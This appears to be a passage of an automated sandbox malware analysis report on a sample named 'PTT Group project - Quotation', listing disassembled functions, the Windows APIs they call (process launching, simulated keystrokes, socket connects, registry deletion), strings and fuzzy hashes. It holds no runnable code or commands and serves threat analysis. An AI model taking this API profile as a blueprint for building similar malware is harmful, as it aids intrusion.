IsWindowEnabled.USER32(00FB5C58), ref: 0099B6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0099B795
SendMessageW.USER32(00FB5C58,000000B0,?,?), ref: 0099B7CC
IsDlgButtonChecked.USER32(?,?), ref: 0099B809
GetWindowLongW.USER32(00FB5C58,000000EC), ref: 0099B82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0099B843

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: f68f14e4d7dc2dea62ef201324d4d4fc4d9d9913ff4811270c1b77679d2d39de
Instruction ID: 4d7150a9e9576491b29136321eb9f340e5b5cea3c57bd2fd88b98a4fc1aad32f
Opcode Fuzzy Hash: f68f14e4d7dc2dea62ef201324d4d4fc4d9d9913ff4811270c1b77679d2d39de
Instruction Fuzzy Hash: 0071BF34604304AFEF209FA8D9E4FAABBBDFF89310F04456AE94597261C739A950DB10

Function 0098F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0098F75C
_memset.LIBCMT ref: 0098F825
ShellExecuteExW.SHELL32(?), ref: 0098F86A

Part of subcall function 00919997: __itow.LIBCMT ref: 009199C2
Part of subcall function 00919997: __swprintf.LIBCMT ref: 00919A0C

Part of subcall function 0092FEC6: _wcscpy.LIBCMT ref: 0092FEE9

GetProcessId.KERNEL32(00000000), ref: 0098F8E1
CloseHandle.KERNEL32(00000000), ref: 0098F910

Strings

@, xrefs: 0098F839

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 8a44695f9b953222ab0506f390e0e5eaabde30e17f0d2c9bd0f9424fd17b4c8c
Instruction ID: e0ad2762fc46292eeb722ab6f1a4d4e77b894712aed1e01c9037d47ad245bad0
Opcode Fuzzy Hash: 8a44695f9b953222ab0506f390e0e5eaabde30e17f0d2c9bd0f9424fd17b4c8c
Instruction Fuzzy Hash: 34617C75A006199FCB14EF54C5A1AAEBBF5FF88310F148469E85AAB351CB35AD80CF90

Function 0097145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0097149C
GetKeyboardState.USER32(?), ref: 009714B1
SetKeyboardState.USER32(?), ref: 00971512
PostMessageW.USER32(?,00000101,00000010,?), ref: 00971540
PostMessageW.USER32(?,00000101,00000011,?), ref: 0097155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 009715A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 009715C8

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: f54ea627c47d0d38cedab2ac9b24e6923b494a97fa9313a5ad6e316ee209b4cb
Instruction ID: ae20cedd02d0c30f7c16489506e1585f5646e41b55c112c1d9d4a27fc2069359
Opcode Fuzzy Hash: f54ea627c47d0d38cedab2ac9b24e6923b494a97fa9313a5ad6e316ee209b4cb
Instruction Fuzzy Hash: 1151E2A26087D53FFB3A463C8C45BBABEAD6B46304F08C489F1D9598D2C298DC84D750

Function 00971276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 009712B5
GetKeyboardState.USER32(?), ref: 009712CA
SetKeyboardState.USER32(?), ref: 0097132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00971357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00971374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 009713B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 009713D9

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: daeaf8edeee3ba7ca88d5cbcd2dd98bb1816337273a1af13f5c95ae4e964bf91
Instruction ID: bcc9ebcda24ecea32f8fb5477a2be17d0a827826d21889a6ebe33a33dbd9089b
Opcode Fuzzy Hash: daeaf8edeee3ba7ca88d5cbcd2dd98bb1816337273a1af13f5c95ae4e964bf91
Instruction Fuzzy Hash: 7351E3A25087D53EFB3682288C55B7ABFAD6B06300F08C589E1DC9A8D2D394EC94E751

Function 0097589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 009758AC
_wcsncpy.LIBCMT ref: 009758E1
_wcsncpy.LIBCMT ref: 00975913
_wcsncpy.LIBCMT ref: 00975946
_wcsncpy.LIBCMT ref: 00975988
_wcsncpy.LIBCMT ref: 009759C2
_wcsncpy.LIBCMT ref: 009759F1

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: acd627e49aaf0c0a6f6f5a70586857be5ceb5757b2eba93ea45d2aab5540f873
Instruction ID: a725101509cf0318fc72a3d8e131a7ada64b15db2f9368734e6f3bcd61777157
Opcode Fuzzy Hash: acd627e49aaf0c0a6f6f5a70586857be5ceb5757b2eba93ea45d2aab5540f873
Instruction Fuzzy Hash: 1841836AC20528B6CB50EBB48886ACFB3B89F44310F518966F618E3121E634E755CBE5

Function 009738AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 009748AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009738D3,?), ref: 009748C7

Part of subcall function 009748AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009738D3,?), ref: 009748E0

lstrcmpiW.KERNEL32(?,?), ref: 009738F3
_wcscmp.LIBCMT ref: 0097390F
MoveFileW.KERNEL32(?,?), ref: 00973927
_wcscat.LIBCMT ref: 0097396F
SHFileOperationW.SHELL32(?), ref: 009739DB

Strings

\*.*, xrefs: 00973969

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: f03743fd2f9875795d2056b686c0918678e051a910fc6d69baa571b4bb824098
Instruction ID: d7d555825b3b8de7465f517794f165c756f04c61dc9c117fedd043460406187d
Opcode Fuzzy Hash: f03743fd2f9875795d2056b686c0918678e051a910fc6d69baa571b4bb824098
Instruction Fuzzy Hash: 5741627350C3449AC752EF64C845ADFB7ECAF88340F54892EB58AC3151EB74D688CB52

Function 00997500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00997519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009975C0
IsMenu.USER32(?), ref: 009975D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00997620
DrawMenuBar.USER32 ref: 00997633

Strings

0, xrefs: 0099750D

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 8df3016eb9db13afa6117b9beac919edc4425241f3efd0466d654f0bf9f7b5fb
Instruction ID: 9c36602263ec96787e90dbd0c1678eab220e0c3654d404d5bd9053e450c03157
Opcode Fuzzy Hash: 8df3016eb9db13afa6117b9beac919edc4425241f3efd0466d654f0bf9f7b5fb
Instruction Fuzzy Hash: 21412875A15609EFDF20DF98D884EAABBF8FB08310F04812AF91597250DB30AD50DFA1

Function 0099122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0099125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00991286
FreeLibrary.KERNEL32(00000000), ref: 0099133D

Part of subcall function 0099122D: RegCloseKey.ADVAPI32(?), ref: 009912A3
Part of subcall function 0099122D: FreeLibrary.KERNEL32(?), ref: 009912F5
Part of subcall function 0099122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00991318

RegDeleteKeyW.ADVAPI32(?,?), ref: 009912E0

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 0d9024b917061585e6ef275eb1c5f85daf7647d92a2007ce3542662c949c6bba
Instruction ID: b78d5cd04fc32c687ec7fdd418610bb5cd7f0ece3ccdd6544539d2b99cc2f6a5
Opcode Fuzzy Hash: 0d9024b917061585e6ef275eb1c5f85daf7647d92a2007ce3542662c949c6bba
Instruction Fuzzy Hash: F9314D71A1510ABFDF149B98DC9AAFEB7BCFF08300F00016AE511E2141DA749E859AA0

Function 0099653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0099655B
GetWindowLongW.USER32(00FB5C58,000000F0), ref: 0099658E
GetWindowLongW.USER32(00FB5C58,000000F0), ref: 009965C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009965F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0099661F
GetWindowLongW.USER32(00000000,000000F0), ref: 00996630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0099664A

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 115c2db3521d0584b88d05aa1eef67cf398e65946c58ae41d9d3c1c8c603ff24
Instruction ID: c32c1221939703edd373a5731c1075ab03d48caf2093dc7ca903abd895289bd3
Opcode Fuzzy Hash: 115c2db3521d0584b88d05aa1eef67cf398e65946c58ae41d9d3c1c8c603ff24
Instruction Fuzzy Hash: DA310230658214AFEF208F1CDC98F553BE9FB4A354F1A01A9F501CB2B5CB61A880EB42

Function 00986486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009880A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009880CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009864D9
WSAGetLastError.WSOCK32(00000000), ref: 009864E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00986521
connect.WSOCK32(00000000,?,00000010), ref: 0098652A
WSAGetLastError.WSOCK32 ref: 00986534
closesocket.WSOCK32(00000000), ref: 0098655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00986576

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: a382ad6664a435769c591d53d8f3426155d77997ac97fbc1aa5da1329ba7099f
Instruction ID: bb0922b2d38de4e5bcad36ae15a719e9be6835151b4e92f7c7d2f4147ca171c6
Opcode Fuzzy Hash: a382ad6664a435769c591d53d8f3426155d77997ac97fbc1aa5da1329ba7099f
Instruction Fuzzy Hash: F031B331610118AFDB10AF68CC95BBEBBADEF44710F044029F946DB391DB74AD44DBA1

Function 0096E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0096E0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0096E120
SysAllocString.OLEAUT32(00000000), ref: 0096E123
SysAllocString.OLEAUT32 ref: 0096E144
SysFreeString.OLEAUT32 ref: 0096E14D
StringFromGUID2.OLE32(?,?,00000028), ref: 0096E167
SysAllocString.OLEAUT32(?), ref: 0096E175

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: f2e1b7feb122985eef62a2e6e754b7c1f6ce8108abd008d3bec61e6c7c448050
Instruction ID: fc85a5faddf1e5b9e4f89a44c0559b352d9d68c8c036991eb75b18b663445ae6
Opcode Fuzzy Hash: f2e1b7feb122985eef62a2e6e754b7c1f6ce8108abd008d3bec61e6c7c448050
Instruction Fuzzy Hash: AB216579608108AFDF109FACDC88DABB7EDEB0A760B118136F915CB260DA74DC41DB64

Function 0099783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00911D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00911D73
Part of subcall function 00911D35: GetStockObject.GDI32(00000011), ref: 00911D87
Part of subcall function 00911D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00911D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009978A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009978AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009978B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009978C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009978D4

Strings

Msctls_Progress32, xrefs: 00997872

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: d0efc159e9c81a2601c0be0d2fcd2d3622eab1b9798e66039da2700b5addc096
Instruction ID: 464111baac89daf8d6b49c74a5df0c11dc1def6b817441a402496c871ac0070e
Opcode Fuzzy Hash: d0efc159e9c81a2601c0be0d2fcd2d3622eab1b9798e66039da2700b5addc096
Instruction Fuzzy Hash: 281190B265421DBFEF159FA5CC85EEBBF6DEF48758F014115BA04A2090CB729C21DBA0

Function 009341C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00934292,?), ref: 009341E3
GetProcAddress.KERNEL32(00000000), ref: 009341EA
EncodePointer.KERNEL32(00000000), ref: 009341F6
DecodePointer.KERNEL32(00000001,00934292,?), ref: 00934213

Strings

combase.dll, xrefs: 009341DE
RoInitialize, xrefs: 009341D2

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: fd830ed877f892f422d31851d3dcaf7c12f55364f1e3f661c011454a154f1c08
Instruction ID: 7b79bf29b5c56805d49c090e148b0745346aa7ff975f8ce163cef2280a4de648
Opcode Fuzzy Hash: fd830ed877f892f422d31851d3dcaf7c12f55364f1e3f661c011454a154f1c08
Instruction Fuzzy Hash: B4E01AB06FD300AFEB205BB8EC1AB047BA8B77174AF514426B421E50E0DBB550D5AF00

Function 0093429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009341B8), ref: 009342B8
GetProcAddress.KERNEL32(00000000), ref: 009342BF
EncodePointer.KERNEL32(00000000), ref: 009342CA
DecodePointer.KERNEL32(009341B8), ref: 009342E5

Strings

combase.dll, xrefs: 009342B3
RoUninitialize, xrefs: 009342A7

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 2ab7f2fcb82f6dbce4ed9376d6e0a1bc8f0066ab88cd5f71fcc2bcf8dc5075bf
Instruction ID: 3b81cacfb42c015fea2c270729c8c92038bc8e28130dba4516293934a17bbafc
Opcode Fuzzy Hash: 2ab7f2fcb82f6dbce4ed9376d6e0a1bc8f0066ab88cd5f71fcc2bcf8dc5075bf
Instruction Fuzzy Hash: F4E0B6785AE311ABEB109B68EC1EB057BA8B725786F114036F021F50A0CBB49584EB54

Function 0097675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009768AD
_memmove.LIBCMT ref: 009767E8

Part of subcall function 00919997: __itow.LIBCMT ref: 009199C2
Part of subcall function 00919997: __swprintf.LIBCMT ref: 00919A0C

_memmove.LIBCMT ref: 0097685B
_memmove.LIBCMT ref: 00976942
_memmove.LIBCMT ref: 0097695B
_memmove.LIBCMT ref: 00976977

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 93b3fe1bf09b770244ec23dce923942e0d514e4956ba1ddd2cbb217d59e0d148
Instruction ID: 91cd6f29f8d637aae026f6bc65df7c0b71824d4ed61fa33a826df121e86b8e84
Opcode Fuzzy Hash: 93b3fe1bf09b770244ec23dce923942e0d514e4956ba1ddd2cbb217d59e0d148
Instruction Fuzzy Hash: 4E61223160065E9BCF15EF64CC92FFE77A8AF84308F048519F95A5B292DB34AC81CB51

Function 0099046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00917F41: _memmove.LIBCMT ref: 00917F82

Part of subcall function 009910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00990038,?,?), ref: 009910BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00990548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00990588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 009905AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009905D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00990617
RegCloseKey.ADVAPI32(00000000), ref: 00990624

Memory Dump Source

Source File: 00000000.00000002.1649411175.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true

Associated: 00000000.00000002.1649401038.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.000000000099F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649447088.00000000009C5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649476883.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649489042.00000000009D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_910000_PTT Group project - Quotation.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: ec8c12f6af38343711346e94d31e9d986f8615882e925a2c282a9915fe421fd0
Instruction ID: da9e0f78bd4d61bc3d3d3a036e6a25f16067bfea974803e692bde1a71fc4b1cd
Opcode Fuzzy Hash: ec8c12f6af38343711346e94d31e9d986f8615882e925a2c282a9915fe421fd0
Instruction Fuzzy Hash: 39515731608204AFCB14EF68C895EAABBE9FFC9714F04492DF495872A1DB31E944DB52

